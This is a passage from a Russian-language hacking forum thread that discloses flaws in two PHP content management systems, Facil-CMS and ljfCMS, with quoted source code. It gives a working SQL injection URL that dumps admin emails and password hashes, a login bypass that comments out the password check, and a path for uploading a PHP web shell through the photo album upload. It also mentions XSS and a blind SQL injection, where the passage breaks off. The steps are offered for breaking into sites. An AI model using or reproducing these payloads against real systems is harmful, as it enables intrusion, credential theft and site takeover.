[/COLOR][COLOR="#0000BB"]$utils[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$utils[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]formatDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][] = array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]MoveNext[/COLOR][COLOR="#007700"]();
}
return[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"];
}
}
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Код:
Code:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email,0x3a,password+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
2. Другой способ попасть в админку, если не получилось брутануть хэш админа (урл выше).
login.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
require_once([/COLOR][COLOR="#DD0000"]'config.inc.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_INCLUDES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/facil-settings.php'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]])
{
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/i18n/lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'FACIL_LANGUAGE'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/config.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/class/index.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Users[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]is_null[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]) && !empty([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Users[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UID'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UTYPE'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'EMAIL'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getEmail[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'NAME'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: modules.php?modload=Users"[/COLOR][COLOR="#007700"]);
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_BAD_USER_OR_PASSWORD_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logoff'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"])
{
foreach([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
unset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
}
else
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Для этого способа требуется лишь мыло админа.
Код:
Code:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
Для авторизации админом потребуется лишь ввести мыло и любой пароль, при этом закомментив строку сразу после ввода мыла, то бишь:
Код:
Code:
admin@facilcms.org--
или
Код:
Code:
admin@facilcms.org/*
3. Заливаемся
adminPhotos.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]'header.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]themeFacil[/COLOR][COLOR="#007700"]();
print[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]moduleTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Albums'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
switch([/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"])
{
default:
break;
case[/COLOR][COLOR="#DD0000"]"add"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comment'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setAlbum[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setComment[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setFile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Add[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_UPLOADED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=view&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_UPLOADING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
break;
case[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$form[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]formPhotos[/COLOR][COLOR="#007700"]();
print[/COLOR][COLOR="#0000BB"]$form[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
break;
case[/COLOR][COLOR="#DD0000"]"change"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comment'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setComment[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Update[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_CHANGED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=photo&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_UPDATING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
break;
case[/COLOR][COLOR="#DD0000"]"erase"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Erase[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_ERASED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=view&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAlbum[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_ERASING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
}
break;
}
require_once([/COLOR][COLOR="#DD0000"]'footer.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Шелл льем "в открытом виде" через картинки в меню альбомов:
Код:
Code:
http://temp/modules/Albums/albums/1/file/shell.php
4. XSS
ИКСы там повсюду (пассивки) - форма авторизации, поиск и т.д.
|
|
|
|
03.08.2011, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
ljfCMS blind sql-inj [POST method]
made in china
login.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"login_sucess"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Action"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]AName[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"login sucess"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"location"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"index.php"[/COLOR][COLOR="#007700"]);
}
else
{
new[/COLOR][COLOR="#0000BB"]ActionLog[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"LogType"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"login_err"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Action"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]AName[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]APwd[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"�û���������"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"location"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"login.php"[/COLOR][COLOR="#007700"]);
}
}
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'AID'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]session_destroy[/COLOR][COLOR="#007700"]();
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]if(location.href != top.location.href)top.location.href=location.href;
�û���
����
[COLOR="#0000BB"][/COLOR][/COLOR]
Admin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]AID[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from Admin where PID=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]AID[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][] = new[/COLOR][COLOR="#0000BB"]Admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]);
}
}
return[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]parent[/COLOR][COLOR="#007700"]()
{
global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]PID[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
return[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from Admin where AID=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]PID[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]CPower[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]CPower[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postdata[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postdata[/COLOR][COLOR="#007700"]);
global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"];
